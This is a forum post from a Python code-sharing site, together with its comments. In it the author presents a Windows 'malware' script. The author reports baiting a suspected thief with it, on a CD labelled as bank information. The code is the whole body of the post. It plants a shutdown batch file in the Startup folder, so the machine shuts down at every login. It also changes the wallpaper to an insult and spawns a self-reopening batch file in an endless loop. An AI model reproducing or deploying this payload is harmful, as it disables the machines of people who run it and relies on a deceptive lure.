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"THIVES" continues shut down ~scriptkiddish - Python Code Bank

"THIVES" continues shut down ~scriptkiddish
At my old job i made a cd with some movies for a friend. He was a server/waiter and didn't have a place to put it on himself, so he stuffed it in an open locker. granet he should have been more careful about it. That store has also claimed three shirts, one jacket, one thumbdrive, and a hat. So i wrote this, compiled with py2exe and burnt it to a cd with a name of bank info and placed it in the locker at work, at the end of my shift it was gone. I hope who ever took it learned their lesson. The fucked.jpg is an image saying your fucked and is set as the background. needs to be in the same directory as the program else errors will be raised, could be taken out though. lol.bat is a bach file that opens itself continuesly. needs to be created manually and in the same directory, else errors will be raised.
                #Malware example in python
#Written by Tech B
#For Educational Use Only
#Places a shutdown batch in the startup file

import os, ctypes, time, winsound, random

all = "shutdown /s /t 1" #This is the payload
                         #command shutsdown the system 1 sec after executing 

who = os.popen('whoami')        #This finds the current user
who = who.read()                #to be used in the path 
who = who[who.index('\\')+1:-1] #to the startup folder 

p = os.getcwd()+"\\fucked.jpg" #Image saying your fucked and set as the background
ctypes.windll.user32.SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, p, 0)

#This creates and writes the .bat that will shutdown the system in the startup folder
f = open("C:\\Users\\"+who+"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\theives.bat","w")

#Kind of a double loop, opens a .bat that opens itself.
#contents of lol.bat:
#@echo off
#color 7c
#echo T       TT        T    HH                              FFFFFFFFFFFFFFF
#echo         TT    HH       HH                  EEEEEEEEEE  FF
#echo         TT    HH       HH        IIII    EE          E FF
#echo         TT    HHHHHHHHHHH         II    EE           E FFFFFFFFFF
#echo         TT    HH       HH         II    EEEEEEEEEEEEEE FF
#echo         TT    HH       HH         II     EE            FF
#echo          T    HH       HH        IIII     EE           FF
#echo          T    H        H   IIIIIIIIIIIIII   EEEEEEEEEEEFFFF
#start lol.bat

while 1:
  winsound.Beep(random.randint(900,2750),100) #plays random tones
  os.popen("start lol.bat")
fuser's avatar
fuser 14 years ago

err…dude, you need to change your program description, since how on earth can your friend turn from a server into a human being? :o

techb's avatar
techb 14 years ago

Server as in waiter at a restaurant. The guy/girl who serves the customers. :D

fuser's avatar
fuser 14 years ago

ahh lol. I did think you meant waiter, why didn't you just say "waiter" cause when you said server I thought you wrote your description wrong.

techb's avatar
techb 14 years ago

When I worked at the restaurant, no one called them waiters. Even the district managers called them servers. But that could be because of location too.

Et3rn1ty's avatar
Et3rn1ty 13 years ago

Every time I debug this it says who = who[who.index('\\')+1:-1] #to the startup folder ValueError: substring not found

Et3rn1ty's avatar
Et3rn1ty 13 years ago

My mistake… just realized I was using an XP box and not vista/7. user file structure is different.